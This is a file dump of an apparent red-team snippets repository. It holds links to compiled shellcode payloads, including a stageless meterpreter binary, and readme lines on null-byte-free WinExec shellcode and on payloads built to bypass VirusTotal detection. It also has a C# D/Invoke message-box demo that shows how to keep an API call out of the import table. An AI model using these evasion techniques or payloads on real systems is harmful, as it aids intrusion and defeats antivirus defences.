/Assembly/Winx64/payloads/1.popcalc/popcalc.o:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Assembly/Winx64/payloads/1.popcalc/popcalc.o
--------------------------------------------------------------------------------
/Assembly/Winx64/payloads/2.cmd/new_cmd.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Assembly/Winx64/payloads/2.cmd/new_cmd.exe
--------------------------------------------------------------------------------
/Assembly/Winx64/payloads/2.cmd/new_cmd.o:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Assembly/Winx64/payloads/2.cmd/new_cmd.o
--------------------------------------------------------------------------------
/Assembly/Winx64/payloads/3.powershell_multi_command/new_powershell.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Assembly/Winx64/payloads/3.powershell_multi_command/new_powershell.exe
--------------------------------------------------------------------------------
/Assembly/Winx64/payloads/3.powershell_multi_command/new_powershell.o:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Assembly/Winx64/payloads/3.powershell_multi_command/new_powershell.o
--------------------------------------------------------------------------------
/Assembly/Winx64/payloads/4.changable_api/Readme.md:
--------------------------------------------------------------------------------
1 | 0-null byte WinExec payload with a changeable command and reworked for a changeable API. CreateProcessA is probably going to be the next API I try to work from this skeleton
2 |
--------------------------------------------------------------------------------
/Assembly/Winx64/payloads/4.changable_api/any_api.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Assembly/Winx64/payloads/4.changable_api/any_api.exe
--------------------------------------------------------------------------------
/Assembly/Winx64/payloads/4.changable_api/any_api.o:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Assembly/Winx64/payloads/4.changable_api/any_api.o
--------------------------------------------------------------------------------
/Assembly/Winx64/payloads/5.ZeroTotal/Readme.md:
--------------------------------------------------------------------------------
1 | Payloads designed to bypass all VirusTotal checks at the time of development.
2 |
--------------------------------------------------------------------------------
/Assembly/Winx64/payloads/5.ZeroTotal/calc/calc_binja.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Assembly/Winx64/payloads/5.ZeroTotal/calc/calc_binja.bin
--------------------------------------------------------------------------------
/Assembly/Winx64/payloads/6.meterpreter/Readme.md:
--------------------------------------------------------------------------------
1 |
2 |
--------------------------------------------------------------------------------
/Assembly/Winx64/payloads/6.meterpreter/meterpreter_stageless.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Assembly/Winx64/payloads/6.meterpreter/meterpreter_stageless.bin
--------------------------------------------------------------------------------
/Assembly/Winx64/payloads/Readme.md:
--------------------------------------------------------------------------------
1 | Payloads based on:
2 |
3 | https://www.exploit-db.com/exploits/49819
4 | by Bobby Cooke (boku)
5 |
--------------------------------------------------------------------------------
/C#/CreateProcess/CreateProcess/CreateProcess.csproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 | Exe
5 | netcoreapp3.1
6 |
7 |
8 |
9 |
--------------------------------------------------------------------------------
/C#/CreateProcess/CreateProcess/bin/Debug/netcoreapp3.1/CreateProcess.deps.json:
--------------------------------------------------------------------------------
1 | {
2 | "runtimeTarget": {
3 | "name": ".NETCoreApp,Version=v3.1",
4 | "signature": ""
5 | },
6 | "compilationOptions": {},
7 | "targets": {
8 | ".NETCoreApp,Version=v3.1": {
9 | "CreateProcess/1.0.0": {
10 | "runtime": {
11 | "CreateProcess.dll": {}
12 | }
13 | }
14 | }
15 | },
16 | "libraries": {
17 | "CreateProcess/1.0.0": {
18 | "type": "project",
19 | "serviceable": false,
20 | "sha512": ""
21 | }
22 | }
23 | }
--------------------------------------------------------------------------------
/C#/CreateProcess/CreateProcess/bin/Debug/netcoreapp3.1/CreateProcess.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/CreateProcess/CreateProcess/bin/Debug/netcoreapp3.1/CreateProcess.dll
--------------------------------------------------------------------------------
/C#/CreateProcess/CreateProcess/bin/Debug/netcoreapp3.1/CreateProcess.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/CreateProcess/CreateProcess/bin/Debug/netcoreapp3.1/CreateProcess.exe
--------------------------------------------------------------------------------
/C#/CreateProcess/CreateProcess/bin/Debug/netcoreapp3.1/CreateProcess.pdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/CreateProcess/CreateProcess/bin/Debug/netcoreapp3.1/CreateProcess.pdb
--------------------------------------------------------------------------------
/C#/CreateProcess/CreateProcess/bin/Debug/netcoreapp3.1/CreateProcess.runtimeconfig.dev.json:
--------------------------------------------------------------------------------
1 | {
2 | "runtimeOptions": {
3 | "additionalProbingPaths": [
4 | "C:\\Users\\0xtriboulet\\.dotnet\\store\\|arch|\\|tfm|",
5 | "C:\\Users\\0xtriboulet\\.nuget\\packages"
6 | ]
7 | }
8 | }
--------------------------------------------------------------------------------
/C#/CreateProcess/CreateProcess/bin/Debug/netcoreapp3.1/CreateProcess.runtimeconfig.json:
--------------------------------------------------------------------------------
1 | {
2 | "runtimeOptions": {
3 | "tfm": "netcoreapp3.1",
4 | "framework": {
5 | "name": "Microsoft.NETCore.App",
6 | "version": "3.1.0"
7 | }
8 | }
9 | }
--------------------------------------------------------------------------------
/C#/CreateProcess/CreateProcess/obj/CreateProcess.csproj.nuget.g.targets:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 | $(MSBuildAllProjects);$(MSBuildThisFileFullPath)
5 |
6 |
--------------------------------------------------------------------------------
/C#/CreateProcess/CreateProcess/obj/Debug/netcoreapp3.1/CreateProcess.AssemblyInfoInputs.cache:
--------------------------------------------------------------------------------
1 | b351b3d00ca3c03e51b59834718911d9c23098dd
2 |
--------------------------------------------------------------------------------
/C#/CreateProcess/CreateProcess/obj/Debug/netcoreapp3.1/CreateProcess.GeneratedMSBuildEditorConfig.editorconfig:
--------------------------------------------------------------------------------
1 | is_global = true
2 | build_property.RootNamespace = CreateProcess
3 | build_property.ProjectDir = C:\Users\0xtriboulet\Documents\cs-progs\CreateProcess\CreateProcess\
4 |
--------------------------------------------------------------------------------
/C#/CreateProcess/CreateProcess/obj/Debug/netcoreapp3.1/CreateProcess.assets.cache:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/CreateProcess/CreateProcess/obj/Debug/netcoreapp3.1/CreateProcess.assets.cache
--------------------------------------------------------------------------------
/C#/CreateProcess/CreateProcess/obj/Debug/netcoreapp3.1/CreateProcess.csproj.AssemblyReference.cache:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/CreateProcess/CreateProcess/obj/Debug/netcoreapp3.1/CreateProcess.csproj.AssemblyReference.cache
--------------------------------------------------------------------------------
/C#/CreateProcess/CreateProcess/obj/Debug/netcoreapp3.1/CreateProcess.csproj.CoreCompileInputs.cache:
--------------------------------------------------------------------------------
1 | 3fadf03217e11926521b06ed9b8085675261cf23
2 |
--------------------------------------------------------------------------------
/C#/CreateProcess/CreateProcess/obj/Debug/netcoreapp3.1/CreateProcess.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/CreateProcess/CreateProcess/obj/Debug/netcoreapp3.1/CreateProcess.dll
--------------------------------------------------------------------------------
/C#/CreateProcess/CreateProcess/obj/Debug/netcoreapp3.1/CreateProcess.genruntimeconfig.cache:
--------------------------------------------------------------------------------
1 | 3881e9f28961f9ea3c56435a33a20e8625ca3050
2 |
--------------------------------------------------------------------------------
/C#/CreateProcess/CreateProcess/obj/Debug/netcoreapp3.1/CreateProcess.pdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/CreateProcess/CreateProcess/obj/Debug/netcoreapp3.1/CreateProcess.pdb
--------------------------------------------------------------------------------
/C#/CreateProcess/CreateProcess/obj/Debug/netcoreapp3.1/apphost.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/CreateProcess/CreateProcess/obj/Debug/netcoreapp3.1/apphost.exe
--------------------------------------------------------------------------------
/C#/CreateProcess/CreateProcess/obj/project.nuget.cache:
--------------------------------------------------------------------------------
1 | {
2 | "version": 2,
3 | "dgSpecHash": "saUOiuZs4N1XGJjv8U8hSTphYX/o7jDBupib+9SsVYrMLsjiGA5Ef9mmzG37uAFnWIrBwREfu6Zl4SY+Vdtdpg==",
4 | "success": true,
5 | "projectFilePath": "C:\\Users\\0xtriboulet\\Documents\\cs-progs\\CreateProcess\\CreateProcess\\CreateProcess.csproj",
6 | "expectedPackageFiles": [],
7 | "logs": []
8 | }
--------------------------------------------------------------------------------
/C#/CreateProcess/Readme.md:
--------------------------------------------------------------------------------
1 |
2 |
--------------------------------------------------------------------------------
/C#/DInvoke/CreateProcess_DInvoke/ConsoleApp1/ConsoleApp1/ConsoleApp1.csproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 | Exe
5 | netcoreapp3.1
6 |
7 |
8 |
9 |
10 | ..\..\..\..\..\..\..\Tools\DInvoke\DInvoke\DInvoke\bin\Debug\DInvoke.dll
11 |
12 |
13 |
14 |
15 |
--------------------------------------------------------------------------------
/C#/DInvoke/CreateProcess_DInvoke/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/ConsoleApp1.deps.json:
--------------------------------------------------------------------------------
1 | {
2 | "runtimeTarget": {
3 | "name": ".NETCoreApp,Version=v3.1",
4 | "signature": ""
5 | },
6 | "compilationOptions": {},
7 | "targets": {
8 | ".NETCoreApp,Version=v3.1": {
9 | "ConsoleApp1/1.0.0": {
10 | "dependencies": {
11 | "DInvoke": "1.0.0.0"
12 | },
13 | "runtime": {
14 | "ConsoleApp1.dll": {}
15 | }
16 | },
17 | "DInvoke/1.0.0.0": {
18 | "runtime": {
19 | "DInvoke.dll": {
20 | "assemblyVersion": "1.0.0.0",
21 | "fileVersion": "1.0.0.0"
22 | }
23 | }
24 | }
25 | }
26 | },
27 | "libraries": {
28 | "ConsoleApp1/1.0.0": {
29 | "type": "project",
30 | "serviceable": false,
31 | "sha512": ""
32 | },
33 | "DInvoke/1.0.0.0": {
34 | "type": "reference",
35 | "serviceable": false,
36 | "sha512": ""
37 | }
38 | }
39 | }
--------------------------------------------------------------------------------
/C#/DInvoke/CreateProcess_DInvoke/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/ConsoleApp1.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/DInvoke/CreateProcess_DInvoke/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/ConsoleApp1.dll
--------------------------------------------------------------------------------
/C#/DInvoke/CreateProcess_DInvoke/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/ConsoleApp1.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/DInvoke/CreateProcess_DInvoke/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/ConsoleApp1.exe
--------------------------------------------------------------------------------
/C#/DInvoke/CreateProcess_DInvoke/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/ConsoleApp1.pdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/DInvoke/CreateProcess_DInvoke/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/ConsoleApp1.pdb
--------------------------------------------------------------------------------
/C#/DInvoke/CreateProcess_DInvoke/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/ConsoleApp1.runtimeconfig.dev.json:
--------------------------------------------------------------------------------
1 | {
2 | "runtimeOptions": {
3 | "additionalProbingPaths": [
4 | "C:\\Users\\0xtriboulet\\.dotnet\\store\\|arch|\\|tfm|",
5 | "C:\\Users\\0xtriboulet\\.nuget\\packages"
6 | ]
7 | }
8 | }
--------------------------------------------------------------------------------
/C#/DInvoke/CreateProcess_DInvoke/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/ConsoleApp1.runtimeconfig.json:
--------------------------------------------------------------------------------
1 | {
2 | "runtimeOptions": {
3 | "tfm": "netcoreapp3.1",
4 | "framework": {
5 | "name": "Microsoft.NETCore.App",
6 | "version": "3.1.0"
7 | }
8 | }
9 | }
--------------------------------------------------------------------------------
/C#/DInvoke/CreateProcess_DInvoke/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/DInvoke.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/DInvoke/CreateProcess_DInvoke/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/DInvoke.dll
--------------------------------------------------------------------------------
/C#/DInvoke/CreateProcess_DInvoke/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/DInvoke.pdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/DInvoke/CreateProcess_DInvoke/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/DInvoke.pdb
--------------------------------------------------------------------------------
/C#/DInvoke/CreateProcess_DInvoke/ConsoleApp1/ConsoleApp1/obj/ConsoleApp1.csproj.nuget.g.targets:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 | $(MSBuildAllProjects);$(MSBuildThisFileFullPath)
5 |
6 |
--------------------------------------------------------------------------------
/C#/DInvoke/CreateProcess_DInvoke/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.AssemblyInfoInputs.cache:
--------------------------------------------------------------------------------
1 | 0cbac02cf6b33ab9449e1ec02e8dbba2474e8080
2 |
--------------------------------------------------------------------------------
/C#/DInvoke/CreateProcess_DInvoke/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.GeneratedMSBuildEditorConfig.editorconfig:
--------------------------------------------------------------------------------
1 | is_global = true
2 | build_property.RootNamespace = ConsoleApp1
3 | build_property.ProjectDir = C:\Users\0xtriboulet\Documents\cs-progs\CreateProcess_DInvoke\ConsoleApp1\ConsoleApp1\
4 |
--------------------------------------------------------------------------------
/C#/DInvoke/CreateProcess_DInvoke/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.assets.cache:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/DInvoke/CreateProcess_DInvoke/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.assets.cache
--------------------------------------------------------------------------------
/C#/DInvoke/CreateProcess_DInvoke/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.csproj.AssemblyReference.cache:
--------------------------------------------------------------------------------
1 | MBRSC
--------------------------------------------------------------------------------
/C#/DInvoke/CreateProcess_DInvoke/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.csproj.CopyComplete:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/DInvoke/CreateProcess_DInvoke/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.csproj.CopyComplete
--------------------------------------------------------------------------------
/C#/DInvoke/CreateProcess_DInvoke/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.csproj.CoreCompileInputs.cache:
--------------------------------------------------------------------------------
1 | 890e13325aa239a8b4c339ecd90aadc0f11a8268
2 |
--------------------------------------------------------------------------------
/C#/DInvoke/CreateProcess_DInvoke/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/DInvoke/CreateProcess_DInvoke/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.dll
--------------------------------------------------------------------------------
/C#/DInvoke/CreateProcess_DInvoke/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.genruntimeconfig.cache:
--------------------------------------------------------------------------------
1 | 3b5c6a64568502b382a025d7d63fc56001b8cfc2
2 |
--------------------------------------------------------------------------------
/C#/DInvoke/CreateProcess_DInvoke/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.pdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/DInvoke/CreateProcess_DInvoke/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.pdb
--------------------------------------------------------------------------------
/C#/DInvoke/CreateProcess_DInvoke/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/apphost.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/DInvoke/CreateProcess_DInvoke/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/apphost.exe
--------------------------------------------------------------------------------
/C#/DInvoke/CreateProcess_DInvoke/ConsoleApp1/ConsoleApp1/obj/project.nuget.cache:
--------------------------------------------------------------------------------
1 | {
2 | "version": 2,
3 | "dgSpecHash": "s0Rx2AjoogtPrzhPqICiGoIAaOhAaXq7236tFh1d2TUSXH6RhgLHIZ70CFol5UH1GdlgyQTBfhaddK/3tF5Lag==",
4 | "success": true,
5 | "projectFilePath": "C:\\Users\\0xtriboulet\\Documents\\cs-progs\\CreateProcess_DInvoke\\ConsoleApp1\\ConsoleApp1\\ConsoleApp1.csproj",
6 | "expectedPackageFiles": [],
7 | "logs": []
8 | }
--------------------------------------------------------------------------------
/C#/DInvoke/CreateProcess_DInvoke/Readme.md:
--------------------------------------------------------------------------------
1 |
2 |
--------------------------------------------------------------------------------
/C#/DInvoke/MessageBoxW_DIvoke/MessageBoxW_DIvoke/MessageBoxW_DInvoke.csproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 | Exe
5 | netcoreapp3.1
6 |
7 |
8 |
9 |
10 | ..\..\..\..\..\..\..\Tools\DInvoke\DInvoke\DInvoke\bin\Debug\DInvoke.dll
11 |
12 |
13 |
14 |
15 |
--------------------------------------------------------------------------------
/C#/DInvoke/MessageBoxW_DIvoke/MessageBoxW_DIvoke/Program.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Runtime.InteropServices;
3 |
4 | using DInvoke.DynamicInvoke;
5 |
namespace MessageBoxW_DInvoke
{
    /// <summary>
    /// Minimal console program that shows a Win32 message box by passing the DLL name,
    /// the export name and a delegate type to D/Invoke's Generic.DynamicAPIInvoke.
    /// </summary>
    /// <remarks>
    /// This class declares no [DllImport] for MessageBoxW, so the call is not listed as a
    /// P/Invoke import in the assembly metadata. The strings "user32.dll" and "MessageBoxW"
    /// are ordinary literals here, so string inspection of the binary still shows them;
    /// import-table review alone does not, which is why runtime telemetry matters for
    /// this calling pattern.
    /// </remarks>
    class Program
    {
        /// <summary>
        /// Managed prototype for user32!MessageBoxW: stdcall, strings marshalled as Unicode.
        /// </summary>
        [UnmanagedFunctionPointer(CallingConvention.StdCall, CharSet = CharSet.Unicode)]
        delegate int MessageBoxW(IntPtr hWnd, string lpText, string pCaption, uint uType);

        /// <summary>
        /// Builds the argument array and invokes MessageBoxW through D/Invoke.
        /// </summary>
        /// <param name="args">Command-line arguments; not used.</param>
        static void Main(string[] args)
        {
            // uType 0 is MB_OK in the Win32 API: a single OK button, no icon.
            const uint okButtonOnly = 0;

            // Order follows the delegate: owner window (none), body text, caption, type.
            // The boxed types must match the delegate's parameter types, hence the uint.
            object[] callArguments =
            {
                IntPtr.Zero,
                "My first D/Invoke!",
                "Hello world!",
                okButtonOnly
            };

            // The array is passed by ref as the library's signature requires.
            // The value returned by the call (which button was pressed) is discarded.
            Generic.DynamicAPIInvoke(
                "user32.dll",
                "MessageBoxW",
                typeof(MessageBoxW),
                ref callArguments);
        }
    }
}
20 |
--------------------------------------------------------------------------------
/C#/DInvoke/MessageBoxW_DIvoke/MessageBoxW_DIvoke/bin/Debug/netcoreapp3.1/DInvoke.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/DInvoke/MessageBoxW_DIvoke/MessageBoxW_DIvoke/bin/Debug/netcoreapp3.1/DInvoke.dll
--------------------------------------------------------------------------------
/C#/DInvoke/MessageBoxW_DIvoke/MessageBoxW_DIvoke/bin/Debug/netcoreapp3.1/DInvoke.pdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/DInvoke/MessageBoxW_DIvoke/MessageBoxW_DIvoke/bin/Debug/netcoreapp3.1/DInvoke.pdb
--------------------------------------------------------------------------------
/C#/DInvoke/MessageBoxW_DIvoke/MessageBoxW_DIvoke/bin/Debug/netcoreapp3.1/MessageBoxW_DInvoke.deps.json:
--------------------------------------------------------------------------------
1 | {
2 | "runtimeTarget": {
3 | "name": ".NETCoreApp,Version=v3.1",
4 | "signature": ""
5 | },
6 | "compilationOptions": {},
7 | "targets": {
8 | ".NETCoreApp,Version=v3.1": {
9 | "MessageBoxW_DInvoke/1.0.0": {
10 | "dependencies": {
11 | "DInvoke": "1.0.0.0"
12 | },
13 | "runtime": {
14 | "MessageBoxW_DInvoke.dll": {}
15 | }
16 | },
17 | "DInvoke/1.0.0.0": {
18 | "runtime": {
19 | "DInvoke.dll": {
20 | "assemblyVersion": "1.0.0.0",
21 | "fileVersion": "1.0.0.0"
22 | }
23 | }
24 | }
25 | }
26 | },
27 | "libraries": {
28 | "MessageBoxW_DInvoke/1.0.0": {
29 | "type": "project",
30 | "serviceable": false,
31 | "sha512": ""
32 | },
33 | "DInvoke/1.0.0.0": {
34 | "type": "reference",
35 | "serviceable": false,
36 | "sha512": ""
37 | }
38 | }
39 | }
--------------------------------------------------------------------------------
/C#/DInvoke/MessageBoxW_DIvoke/MessageBoxW_DIvoke/bin/Debug/netcoreapp3.1/MessageBoxW_DInvoke.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/DInvoke/MessageBoxW_DIvoke/MessageBoxW_DIvoke/bin/Debug/netcoreapp3.1/MessageBoxW_DInvoke.dll
--------------------------------------------------------------------------------
/C#/DInvoke/MessageBoxW_DIvoke/MessageBoxW_DIvoke/bin/Debug/netcoreapp3.1/MessageBoxW_DInvoke.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/DInvoke/MessageBoxW_DIvoke/MessageBoxW_DIvoke/bin/Debug/netcoreapp3.1/MessageBoxW_DInvoke.exe
--------------------------------------------------------------------------------
/C#/DInvoke/MessageBoxW_DIvoke/MessageBoxW_DIvoke/bin/Debug/netcoreapp3.1/MessageBoxW_DInvoke.pdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/DInvoke/MessageBoxW_DIvoke/MessageBoxW_DIvoke/bin/Debug/netcoreapp3.1/MessageBoxW_DInvoke.pdb
--------------------------------------------------------------------------------
/C#/DInvoke/MessageBoxW_DIvoke/MessageBoxW_DIvoke/bin/Debug/netcoreapp3.1/MessageBoxW_DInvoke.runtimeconfig.dev.json:
--------------------------------------------------------------------------------
1 | {
2 | "runtimeOptions": {
3 | "additionalProbingPaths": [
4 | "C:\\Users\\0xtriboulet\\.dotnet\\store\\|arch|\\|tfm|",
5 | "C:\\Users\\0xtriboulet\\.nuget\\packages"
6 | ]
7 | }
8 | }
--------------------------------------------------------------------------------
/C#/DInvoke/MessageBoxW_DIvoke/MessageBoxW_DIvoke/bin/Debug/netcoreapp3.1/MessageBoxW_DInvoke.runtimeconfig.json:
--------------------------------------------------------------------------------
1 | {
2 | "runtimeOptions": {
3 | "tfm": "netcoreapp3.1",
4 | "framework": {
5 | "name": "Microsoft.NETCore.App",
6 | "version": "3.1.0"
7 | }
8 | }
9 | }
--------------------------------------------------------------------------------
/C#/DInvoke/MessageBoxW_DIvoke/MessageBoxW_DIvoke/obj/Debug/netcoreapp3.1/DInvoke.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/DInvoke/MessageBoxW_DIvoke/MessageBoxW_DIvoke/obj/Debug/netcoreapp3.1/DInvoke.dll
--------------------------------------------------------------------------------
/C#/DInvoke/MessageBoxW_DIvoke/MessageBoxW_DIvoke/obj/Debug/netcoreapp3.1/MessageBoxW_DInvoke.AssemblyInfoInputs.cache:
--------------------------------------------------------------------------------
1 | 43c8296b4e0a8fdf49a8348a6a774af279b8e8ec
2 |
--------------------------------------------------------------------------------
/C#/DInvoke/MessageBoxW_DIvoke/MessageBoxW_DIvoke/obj/Debug/netcoreapp3.1/MessageBoxW_DInvoke.GeneratedMSBuildEditorConfig.editorconfig:
--------------------------------------------------------------------------------
1 | is_global = true
2 | build_property.RootNamespace = MessageBoxW_DInvoke
3 | build_property.ProjectDir = C:\Users\0xtriboulet\Documents\cs-progs\DIvoke\MessageBoxW_DIvoke\MessageBoxW_DIvoke\
4 |
--------------------------------------------------------------------------------
/C#/DInvoke/MessageBoxW_DIvoke/MessageBoxW_DIvoke/obj/Debug/netcoreapp3.1/MessageBoxW_DInvoke.assets.cache:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/DInvoke/MessageBoxW_DIvoke/MessageBoxW_DIvoke/obj/Debug/netcoreapp3.1/MessageBoxW_DInvoke.assets.cache
--------------------------------------------------------------------------------
/C#/DInvoke/MessageBoxW_DIvoke/MessageBoxW_DIvoke/obj/Debug/netcoreapp3.1/MessageBoxW_DInvoke.csproj.AssemblyReference.cache:
--------------------------------------------------------------------------------
1 | MBRSC
--------------------------------------------------------------------------------
/C#/DInvoke/MessageBoxW_DIvoke/MessageBoxW_DIvoke/obj/Debug/netcoreapp3.1/MessageBoxW_DInvoke.csproj.CopyComplete:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/DInvoke/MessageBoxW_DIvoke/MessageBoxW_DIvoke/obj/Debug/netcoreapp3.1/MessageBoxW_DInvoke.csproj.CopyComplete
--------------------------------------------------------------------------------
/C#/DInvoke/MessageBoxW_DIvoke/MessageBoxW_DIvoke/obj/Debug/netcoreapp3.1/MessageBoxW_DInvoke.csproj.CoreCompileInputs.cache:
--------------------------------------------------------------------------------
1 | 8080b4b6e0ab0736b80891287505de97fbf66b6c
2 |
--------------------------------------------------------------------------------
/C#/DInvoke/MessageBoxW_DIvoke/MessageBoxW_DIvoke/obj/Debug/netcoreapp3.1/MessageBoxW_DInvoke.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/DInvoke/MessageBoxW_DIvoke/MessageBoxW_DIvoke/obj/Debug/netcoreapp3.1/MessageBoxW_DInvoke.dll
--------------------------------------------------------------------------------
/C#/DInvoke/MessageBoxW_DIvoke/MessageBoxW_DIvoke/obj/Debug/netcoreapp3.1/MessageBoxW_DInvoke.genruntimeconfig.cache:
--------------------------------------------------------------------------------
1 | 0a28cd972ee4b2cfc5ff5e631d3d6ec2b8dd35a3
2 |
--------------------------------------------------------------------------------
